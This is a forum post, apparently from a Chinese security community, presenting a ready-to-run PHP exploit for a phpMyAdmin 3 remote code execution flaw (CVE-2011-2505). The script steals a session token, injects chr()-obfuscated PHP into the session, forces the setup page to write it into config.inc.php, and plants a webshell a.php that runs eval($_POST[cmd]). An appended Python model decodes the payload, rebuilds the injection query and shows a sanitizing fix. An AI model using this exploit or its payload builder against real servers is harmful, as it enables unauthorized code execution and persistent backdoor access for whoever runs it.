phpMyAdmin3 remote code execute, PHP version exploit
Original poster, posted on 2013-2-21 09:13:03
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months, and my blog has not been updated either.

Last night I was up all night with the kid and saw 黑哥's discussion of the phpMyAdmin3 vulnerability in the PHP security group. I had not looked at the vulnerable code before, though a while back I did see wofeiwo's exp on Weibo. 黑哥 said there was a way to exploit it that is not a "chicken rib" (jilei, something of little use), so during the night I dug through the code, studied it, and wrote this reheated exp. Since I got to it late and plenty of people had already studied it and written exps, mine is a rehash of old news; treat it as research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and to the research spirit of wofeiwo and superhei, role models to learn from. That earlier exp does have some limitations in use, though:
1) it needs session.auto_start = 1;
2) in the default pma3 code the libraries directory is already blocked by .htaccess, so it cannot be accessed.
3) And of course a third one, the gap nobody can get around: the config directory must exist and be writable.

After reading 黑哥's comments in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really is not that much of a chicken rib after all.

So I wrote this PHP version of the exp; the code follows:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * Works only when the directory "config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = rtrim($argv[2], '/').'/';   // the request builder expects a trailing slash

/**
 * Try to determine if the directory "config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
if (strpos($returnstr, '404') !== false) {
    exit("[-] Exploit Failed! The directory:config does not exist!\n");
}

/**
 * Try to get token and sessionid
 * (session id from the Set-Cookie header, token from the first token=...& link in the body)
**/
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token     = isset($resp[3]) ? $resp[3] : '';
$sessionid = isset($resp[1]) ? $resp[1] : '';
if ($token && $sessionid) {
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
} else {
    exit("[-] Can't get token and Session ID, Exploit Failed!\n");
}

// Try to insert shell into session.
// session_to_unset triggers the session bug; after it the _SESSION[...] request
// parameter becomes the content of our own session (the phpMyAdmin cookie).
// The server id (the array key) closes the comment that the setup script later
// writes it into, and the chr() chain decodes to:
//   fputs(fopen('a.php','w'),'<?php eval($_POST[cmd])?>');echo('t00ls');
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net', '', 'phpMyAdmin='.$sessionid);
// Actually, almost all the php files in the home directory of pma3 can be used here.

/**
 * Try to create webshell: saving the setup form writes config/config.inc.php
 * from the poisoned session
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php', 'phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save', 'phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 * (requesting config.inc.php runs the eval(), which drops a.php and echoes t00ls)
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
if (strpos($content, 't00ls') !== false) {
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config does not exist or is not writeable!\n");
}

/**
 * Minimal raw HTTP client: GET when $data is empty, POST otherwise
**/
function php_request($url, $data = '', $cookie = '')
{
    global $host, $path;

    $method = $data ? 'POST' : 'GET';

    $packet  = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    $packet .= $data ? "Content-Length: ".strlen($data)."\r\n" : "";
    $packet .= $cookie ? "Cookie: $cookie\r\n" : "";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data ? $data : "";

    $fp = fsockopen(gethostbyname($host), 80, $errno, $errstr, 10);
    if (!$fp) {
        echo "No response from $host ($errstr)\n";
        die;
    }
    fputs($fp, $packet);

    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);

    return $resp;
}
?>
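Added example, not part of oldjun's post: a small Python model of the three pieces the exp chains together, so you can see what the chr() blob in the db_create.php request decodes to, how PHP's bracket syntax turns the _SESSION[...] parameter into a nested array whose server id carries the payload, and why a comment terminator in that id becomes live code once the setup script writes config/config.inc.php. The render_config banner format (/* Server: name [id] */) and the banner_sanitize hardening are my own model and my own fix, not phpMyAdmin's code or its upstream patch; SAMPLE_RESPONSE is a constructed index.php reply shaped for the exploit's regex.

```python
import re
from urllib.parse import unquote

# PHP stage the exploit's chr() blob decodes to. eval() runs it when the
# poisoned config/config.inc.php is requested: it drops a.php next to the
# config file and echoes the marker the exploit greps for.
STAGE = "fputs(fopen('a.php','w'),'<?php eval($_POST[cmd])?>');echo('t00ls');"


def php_chr_encode(src):
    """Spell a PHP snippet as chr(n).chr(n)... so it survives a raw query
    string: no quotes, spaces or other characters that need URL-encoding."""
    return ".".join("chr(%d)" % ord(c) for c in src)


def php_chr_decode(expr):
    """Reverse of php_chr_encode: pull the byte values back out."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", expr))


def extract_token_and_session(raw_response):
    """The exploit's own regex: session id from the Set-Cookie header, token
    from the first token=...& link in the body. Returns (token, sid)."""
    m = re.search(r"phpMyAdmin=(\w{32,40});(.*?)token=(\w{32})&", raw_response, re.S)
    return (m.group(3), m.group(1)) if m else None


def build_injection_query(token, stage):
    """Query string sent to db_create.php: session_to_unset triggers the
    session bug, _SESSION[...] is what lands in the session. The server id
    (the array key) carries the code; the host value is just a marker."""
    server_id = "*/eval(" + php_chr_encode(stage) + ");/*"
    return ("token=%s&session_to_unset=t00ls"
            "&_SESSION[ConfigFile][Servers][%s][host]=t00ls.net" % (token, server_id))


def php_parse_query(qs):
    """Minimal model of how PHP builds $_GET: a[b][c]=v becomes nested
    arrays, so the injected key arrives as a real nested element."""
    out = {}
    for pair in qs.split("&"):
        key, _, val = pair.partition("=")
        key, val = unquote(key), unquote(val)
        base, _, rest = key.partition("[")
        base = re.sub(r"[ .]", "_", base)      # PHP mangles only the base name
        if not rest:
            out[base] = val
            continue
        keys = [base] + re.findall(r"\[([^\]]*)\]", "[" + rest)
        node = out
        for k in keys[:-1]:
            node = node.setdefault(k, {})
        node[keys[-1]] = val
    return out


def php_quote(s):
    """Single-quoted PHP string literal with var_export-style escaping."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_config(servers, sanitize=lambda s: s):
    """Model (assumption, not pma's code) of a setup writer that emits a
    /* Server: name [id] */ banner comment before each server's settings.
    `sanitize` is applied to the attacker-controlled text in the banner."""
    out = ["<?php", "$i = 0;"]
    for sid, cfg in servers.items():
        name = cfg.get("verbose") or cfg.get("host", "")
        out.append("/* Server: %s [%s] */" % (sanitize(name), sanitize(sid)))
        out.append("$i++;")
        for k, v in cfg.items():
            out.append("$cfg['Servers'][$i][%s] = %s;" % (php_quote(k), php_quote(v)))
    return "\n".join(out) + "\n"


def banner_sanitize(s):
    """Hardening used here (not the upstream patch): nothing that can
    terminate a block comment may reach the banner."""
    return re.sub(r"[^A-Za-z0-9._-]", "_", s)


def live_code(php_src):
    """Drop /* ... */ comments the way the lexer does, ending each at the
    FIRST */ seen. What remains is what PHP would execute."""
    return re.sub(r"/\*.*?\*/", "", php_src, flags=re.S)


# Constructed sample of an index.php reply, shaped to what the regex expects.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: phpMyAdmin=" + "a" * 32 + "; path=/pma/; HttpOnly\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<a href=\"main.php?token=" + "0123456789abcdef" * 2 + "&lang=en\">x</a>"
)


def demo():
    """Whole chain on the sample data: is eval() live in the generated
    config with the vulnerable writer, and with the sanitized one?"""
    token, sid = extract_token_and_session(SAMPLE_RESPONSE)
    parsed = php_parse_query(build_injection_query(token, STAGE))
    servers = parsed["_SESSION"]["ConfigFile"]["Servers"]
    vuln = live_code(render_config(servers))
    hard = live_code(render_config(servers, banner_sanitize))
    return "eval(" in vuln, "eval(" in hard


if __name__ == "__main__":
    print(demo())
```

Run directly, demo() returns (True, False): with the banner written verbatim the "*/" in the server id closes the comment and the eval() chain is executed the moment config.inc.php is included, while the sanitized banner keeps the whole thing inside the comment. php_chr_encode(STAGE) reproduces the blob in the db_create.php request above byte for byte.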